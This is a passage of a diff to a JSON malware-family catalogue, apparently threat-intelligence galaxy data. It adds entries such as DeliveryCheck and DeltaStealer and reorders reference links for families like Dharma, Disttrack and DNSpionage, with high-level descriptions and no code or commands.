"https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", - "https://www.bleepingcomputer.com/news/security/government-software-provider-tyler-technologies-hit-by-ransomware/", - "https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/", - "https://www.secureworks.com/research/threat-profiles/gold-dupont", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.bleepingcomputer.com/news/security/government-software-provider-tyler-technologies-hit-by-ransomware/", "https://threatvector.cylance.com/en_us/home/threat-spotlight-defray-ransomware-hits-healthcare-and-education.html", - "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", "https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf" + "https://www.secureworks.com/research/threat-profiles/gold-dupont", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/", + "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", + "https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals" ], "synonyms": [ "Glushkov" @@ -21477,6 +22484,23 @@ "uuid": "1f1a894f-7a1b-4b98-9280-d33cf884a539", "value": "DeimosC2" }, + { + "description": "According to CERT-UA, this malware makes use of XSLT (Extensible Stylesheet Language Transformations) and COM-hijacking. Its specificity is the presence of a server part, which is usually installed on compromised MS Exchange servers in the form of a MOF (Managed Object Format) file using the Desired State Configuration (DCS) PowerShell tool), effectively turning a legitimate server into a malware control center.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.delivery_check", + "https://cert.gov.ua/article/5213167", + "https://twitter.com/msftsecintel/status/1681695399084539908" + ], + "synonyms": [ + "CAPIBAR", + "GAMEDAY" + ], + "type": [] + }, + "uuid": "73ef709e-c88d-4737-a3fb-81d7ece5c97d", + "value": "DeliveryCheck" + }, { "description": "", "meta": { @@ -21489,6 +22513,19 @@ "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", "value": "Delta(Alfa,Bravo, ...)" }, + { + "description": "Rust-based infostealer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltastealer", + "https://www.trendmicro.com/en_us/research/23/e/rust-based-info-stealers-abuse-github-codespaces.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3b38cd03-a387-43ce-b8d9-c337d51a84d0", + "value": "DeltaStealer" + }, { "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.", "meta": { @@ -21502,7 +22539,7 @@ "value": "Dented" }, { - "description": "According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor – a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the “Windows Default Print Monitor” name; that’s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.\r\n\r\nDePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.", + "description": "According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor \u2013 a trick falling under the \u201cPort Monitors\u201d technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the \u201cWindows Default Print Monitor\u201d name; that\u2019s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.\r\n\r\nDePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deprimon", @@ -21519,9 +22556,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", - "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html", - "https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" + "https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone" ], "synonyms": [], "type": [] @@ -21556,27 +22593,27 @@ "value": "DeroHE" }, { - "description": " A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", + "description": " A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", - "https://attack.mitre.org/groups/G0096", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://www.secureworks.com/research/threat-profiles/bronze-keystone", - "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", - "https://attack.mitre.org/groups/G0001/", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-firestone", - "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/", - "https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/", - "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", - "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf", - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html", + "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", + "https://attack.mitre.org/groups/G0096", "https://web.archive.org/web/20151216071054/http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family", - "https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf" + "https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", + "https://attack.mitre.org/groups/G0001/", + "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/", + "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone" ], "synonyms": [ "PHOTO" @@ -21591,9 +22628,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.desertblade", - "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", + "https://www.youtube.com/watch?v=mrTdSdMMgnk", "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", - "https://www.youtube.com/watch?v=mrTdSdMMgnk" + "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf" ], "synonyms": [], "type": [] @@ -21659,11 +22696,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", - "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", - "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/" + "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/", + "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", + "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html" ], "synonyms": [ "LusyPOS" @@ -21678,37 +22715,44 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground", - "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/", - "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://news.sophos.com/en-us/2020/08/12/color-by-numbers-inside-a-dharma-ransomware-as-a-service-attack/", - "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", - "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://www.acronis.com/en-us/articles/Dharma-ransomware/", - "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/", - "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", + "https://research.checkpoint.com/2018/the-ransomware-doctor-without-a-cure/", "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", "https://securelist.com/cis-ransomware/104452/", - "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", - "https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une", + "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", + "https://asec.ahnlab.com/en/54937/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", + "https://www.acronis.com/en-us/articles/Dharma-ransomware/", + "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack", "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", + "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/", + "https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", "https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://twitter.com/JakubKroustek/status/1087808550309675009", + "https://s3.documentcloud.org/documents/6986753/Secret-Service-Seattle-NIT-Warrant-Application.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "http://web.archive.org/web/20191008053714/http://esec-lab.sogeti.com/posts/2016/06/07/the-story-of-yet-another-ransomfailware.html", + "https://news.sophos.com/en-us/2020/08/12/color-by-numbers-inside-a-dharma-ransomware-as-a-service-attack/", + "https://www.vice.com/en/article/wxqz54/secret-service-network-investigative-technique-ransomware", + "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.group-ib.com/media/iran-cybercriminals/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/", + "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://twitter.com/JakubKroustek/status/1087808550309675009", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/" + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.justice.gov/usao-dc/press-release/file/1021186/download", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", + "https://www.theregister.com/2019/11/11/dharma_decryption_promises_data_recovery/", + "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/", + "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/" ], "synonyms": [ "Arena", @@ -21726,14 +22770,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", - "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", - "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", - "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", "https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced", - "https://blog.cylance.com/a-study-in-bots-diamondfox", + "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", + "https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF", + "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", "https://www.scmagazine.com/inside-diamondfox/article/578478/", - "https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF" + "https://blog.cylance.com/a-study-in-bots-diamondfox" ], "synonyms": [ "Crystal", @@ -21750,20 +22794,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol", - "https://medium.com/walmartglobaltech/diavol-the-enigma-of-ransomware-1fd78ffda648", - "https://arcticwolf.com/resources/blog/karakurt-web", - "https://chuongdong.com/reverse%20engineering/2021/12/17/DiavolRansomware/", - "https://www.bleepingcomputer.com/news/security/fbi-links-diavol-ransomware-to-the-trickbot-cybercrime-group/", "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider", - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://securityintelligence.com/posts/analysis-of-diavol-ransomware-link-trickbot-gang/", + "https://www.scythe.io/library/adversary-emulation-diavol-ransomware-threatthursday", + "https://arcticwolf.com/resources/blog/karakurt-web", + "https://www.binarydefense.com/threat_watch/new-ransomware-diavol-being-dropped-by-trickbot/", "https://medium.com/walmartglobaltech/diavol-resurfaces-91dd93c7d922", "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/", - "https://www.scythe.io/library/adversary-emulation-diavol-ransomware-threatthursday", "https://www.ic3.gov/Media/News/2022/220120.pdf", - "https://www.binarydefense.com/threat_watch/new-ransomware-diavol-being-dropped-by-trickbot/", - "https://heimdalsecurity.com/blog/is-diavol-ransomware-connected-to-wizard-spider/", - "https://www.bleepingcomputer.com/news/security/diavol-ransomware-sample-shows-stronger-connection-to-trickbot-gang/" + "https://securityintelligence.com/posts/analysis-of-diavol-ransomware-link-trickbot-gang/", + "https://www.bleepingcomputer.com/news/security/fbi-links-diavol-ransomware-to-the-trickbot-cybercrime-group/", + "https://medium.com/walmartglobaltech/diavol-the-enigma-of-ransomware-1fd78ffda648", + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://www.bleepingcomputer.com/news/security/diavol-ransomware-sample-shows-stronger-connection-to-trickbot-gang/", + "https://chuongdong.com/reverse%20engineering/2021/12/17/DiavolRansomware/", + "https://heimdalsecurity.com/blog/is-diavol-ransomware-connected-to-wizard-spider/" ], "synonyms": [], "type": [] @@ -21842,12 +22886,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dirtymoe", + "https://decoded.avast.io/martinchlumecky/dirtymoe-5/", + "https://decoded.avast.io/martinchlumecky/dirtymoe-rootkit-driver/", "https://decoded.avast.io/martinchlumecky/dirtymoe-4/", "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html", "https://decoded.avast.io/martinchlumecky/dirtymoe-3/", - "https://decoded.avast.io/martinchlumecky/dirtymoe-5/", - "https://decoded.avast.io/martinchlumecky/dirtymoe-1/", - "https://decoded.avast.io/martinchlumecky/dirtymoe-rootkit-driver/" + "https://decoded.avast.io/martinchlumecky/dirtymoe-1/" ], "synonyms": [], "type": [] @@ -21887,30 +22931,30 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", - "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", - "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", - "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", - "https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf", - "https://malwareindepth.com/shamoon-2012/", - "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", - "https://content.fireeye.com/m-trends/rpt-m-trends-2017", - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", - "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html", - "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", - "https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail", - "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", - "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", - "https://securelist.com/shamoon-the-wiper-copycats-at-work/", - "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/", - "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", + "https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf", + "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/", + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf", - "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/" + "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://securelist.com/shamoon-the-wiper-copycats-at-work/", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://content.fireeye.com/m-trends/rpt-m-trends-2017", + "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html", + "https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks", + "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf", + "https://malwareindepth.com/shamoon-2012/", + "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", + "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail", + "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [ "Shamoon" @@ -21926,10 +22970,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent", "https://documents.trendmicro.com/assets/Tech-Brief-New-Fileless-Botnet-Novter-Distributed-by-KovCoreG-Malvertising-Campaign.pdf", - "https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/", "https://blog.talosintelligence.com/2019/09/divergent-analysis.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-fileless-botnet-novter-distributed-by-kovcoreg-malvertising-campaign/", "https://www.cert-pa.it/notizie/devergent-malware-fileless/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-fileless-botnet-novter-distributed-by-kovcoreg-malvertising-campaign/" + "https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/" ], "synonyms": [ "Novter" @@ -21972,6 +23016,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff", + "https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d", "https://www.flashpoint-intel.com/blog/dmsniff-pos-malware-actively-leveraged-target-medium-sized-businesses/" ], "synonyms": [], @@ -21981,7 +23026,7 @@ "value": "DMSniff" }, { - "description": "DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a “policy” file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.", + "description": "DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a \u201cpolicy\u201d file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy", @@ -22011,12 +23056,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html", "https://blog.talosintelligence.com/2017/03/dnsmessenger.html", - "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/", - "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/" + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", + "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/" ], "synonyms": [ "TEXTMATE" @@ -22032,18 +23077,21 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage", "https://www.secureworks.com/research/threat-profiles/cobalt-edgewater", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/", - "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/", - "https://www.us-cert.gov/ncas/alerts/AA19-024A", "https://marcoramilli.com/2019/04/23/apt34-webmask-project/", - "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html", - "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html", + "https://www.us-cert.gov/ncas/alerts/AA19-024A", "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + 